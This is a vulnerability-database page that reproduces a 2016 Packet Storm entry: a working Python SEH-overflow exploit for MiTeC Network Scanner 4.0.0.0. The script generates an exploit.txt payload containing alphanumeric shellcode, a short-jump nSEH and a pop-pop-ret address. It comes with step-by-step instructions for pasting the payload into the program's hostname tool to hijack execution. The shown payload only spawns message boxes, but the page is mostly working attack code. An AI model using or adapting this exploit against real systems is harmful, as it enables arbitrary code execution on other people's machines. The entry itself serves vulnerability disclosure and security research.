Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Network Scanner 4.0.0.0 SEH Overflow

🗓️ 25 Oct 2016 00:00:00Reported by n30m1ndType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Network Scanner Version 4.0.0.0 SEH Overflow Exploit by n30m1nd. Exploit tested on Win7 64bit and Win10 64 bit. Generates "exploit.txt" file for "Detect IP from hostname" tool

Code
`#!/usr/bin/python  
# -*- coding: utf-8 -*-  
  
### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###   
  
# Date: 2016-10-21  
# Exploit Author: n30m1nd  
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit  
# Vendor Homepage: http://www.mitec.cz/  
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip  
# Version: 4.0.0.0  
# Tested on: Win7 64bit and Win10 64 bit  
  
# Credits  
# =======  
# PoC by: INSECT.B - http://binsect00.tistory.com  
# https://www.exploit-db.com/exploits/39447/  
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better  
  
# How to  
# ======  
# * Run this python script. It will generate an "exploit.txt" file.  
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents  
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time  
  
# Exploit code  
# ============  
  
import struct  
  
# MessageBoxA in NetScan.exe => 004042F1  
mbox = (  
"\x25\x41\x41\x41"  
"\x41\x25\x32\x32"  
"\x32\x32\x50\x68"  
"\x70\x77\x6E\x64"  
"\x54\x5F\x50\x57"  
"\x57\x50\x35\x8E"  
"\x60\x60\x55\x35"  
"\x7F\x22\x20\x55"  
"\x50\xC3"  
)  
# JUMP BACK to our shellcode!   
nseh = (  
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)  
"\x34\x51"  
# jne -32h; Jump if ZF = 0  
"\x75\xCC"  
)  
# pop pop ret => 00402E67  
sehh = struct.pack("<L", 0x00402e67)  
  
payl = "A" * (76-48)  
payl+= mbox  
payl+= "A"*(48-len(mbox))  
payl+= nseh + sehh  
  
with open("exploit.txt","wb") as f:  
f.write(payl[:-1])  
print payl  
  
"""  
NOTE:  
The original author of this PoC stated that it was not possible to be   
exploited since all addresses inside the binary contain the null byte.  
As you can see in this exploit, the null byte is added by default at  
the end because strings are null terminated when read from an input   
box. This is why we write the payload minus 1 byte, payl[:-1], because  
we don't need to write the last null byte for the "pop pop ret" jump  
in the "sehh" variable.  
"""  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Oct 2016 00:00Current
0.3Low risk
Vulners AI Score0.3
network scanner version 4.0.0.0seh overflown30m1ndwin7 64bitwin10 64 bitexploit.txt" filedetect ip from hostname tool
19